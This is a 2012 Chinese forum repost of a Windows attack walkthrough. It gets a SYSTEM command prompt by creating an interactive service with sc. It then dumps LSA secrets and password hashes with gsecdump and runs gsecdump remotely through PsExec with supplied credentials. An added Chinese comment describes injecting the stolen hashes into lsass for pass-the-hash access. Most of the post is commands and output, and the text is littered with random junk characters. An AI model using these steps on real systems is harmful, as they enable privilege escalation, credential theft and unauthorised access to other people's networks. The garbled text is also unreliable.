o get a DOS Prompt as NT system:' h' g* W* ~# X
8 l. V! P) w3 sC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
2 f; R$ [5 a2 d) U5 i[SC] CreateService SUCCESS- R% ]$ s: p. E0 y3 G% v4 L
3 x: E- m: s ]6 V: IC:\>sc start shellcmdline% h, E+ [, j* @( C% W0 A6 V7 p/ a
[SC] StartService FAILED 1053:2 W( p2 _* g1 Y: t( m& E2 F
3 i8 z9 B: `6 b) s1 K" i+ C" N- NThe service did not respond to the start or control request in a timely fashion.9 U R: K" Q- J4 r4 `% T: w
6 c' |: h1 T2 A% [" T+ ? m
C:\>sc delete shellcmdline
& z, G4 S8 p' Y0 S[SC] DeleteService SUCCESS
% C1 `; B/ B. _6 T$ g& l* p- t6 m' h) m
! v5 `' ? f; E8 q------------
- c0 ^! X t h9 k, a5 N7 `- k
Then in the new DOS window:% z; d8 Y6 F3 h# H2 i$ G/ h+ `
+ F; `9 r5 G" G4 f CMicrosoft Windows XP [Version 5.1.2600]9 \3 p$ _" G9 @& f
(C) Copyright 1985-2001 Microsoft Corp.8 z1 m, r. A7 H" m
9 K) W/ t& r: @
C:\WINDOWS\system32>whoami
1 X) I# k+ ?4 O" H# ^NT AUTHORITY\SYSTEM( a3 r9 z f; i" P# d. r3 t
# B6 ]5 S! Y% Y! Q+ _C:\WINDOWS\system32>gsecdump -h
0 y' l# d# Y) s7 m+ P# c& h3 Kgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
' M4 e1 Y$ V- Q% B- `/ }3 Qusage: gsecdump [options]
) X7 S, Z6 f4 f
2 ^$ j1 J4 w$ \options:4 f) T5 \! o0 @; k
-h [ --help ] show help- }: U4 ]* N% ?) l: F' R& d
-a [ --dump_all ] dump all secrets% @) P; ?+ H' |& l5 n; m/ y! S
-l [ --dump_lsa ] dump lsa secrets3 U% I( }" q# [2 [# y x
-w [ --dump_wireless ] dump microsoft wireless connections
b2 z& K; x! Q8 F- ^. d-u [ --dump_usedhashes ] dump hashes from active logon sessions. J b D* J" y* L
-s [ --dump_hashes ] dump hashes from SAM/AD2 ?# [0 g$ I8 |1 l
) q' F! G/ h5 V, ~" d9 }) [
Although I like to use:* D# N( Z1 C" t& D9 G4 g
* Q' H3 z3 ?+ {# D0 g3 x- R
PsExec v1.83 - Execute processes remotely
* f6 j! \# b- b& JCopyright (C) 2001-2007 Mark Russinovich4 ^$ D& W' k9 t% W) |) W
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
J0 J. F! `0 L" a) ]
; k/ v i8 O+ U7 B6 mC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT w- e7 S& A3 {3 {0 U9 V
# D, W6 I# }( O: b9 W/ @' Y
to get the hashes from active logon sessions of a remote system.- e! _1 u4 b6 K
K, g, Y% f! z8 f4 j0 y/ U% w% oThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.9 i: ] v P% C
! {* P( U# m# _3 ~
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
& ?( j4 t" X1 Y- t. A原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
: j1 ^% s0 J% |# C4 |' q. s% _( i5 I7 E. _
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
3 V1 }0 H8 p. Y# c. j7 o7 s& G! ] |
发表于 2012-11-6 21:09:29
收藏
支持
反对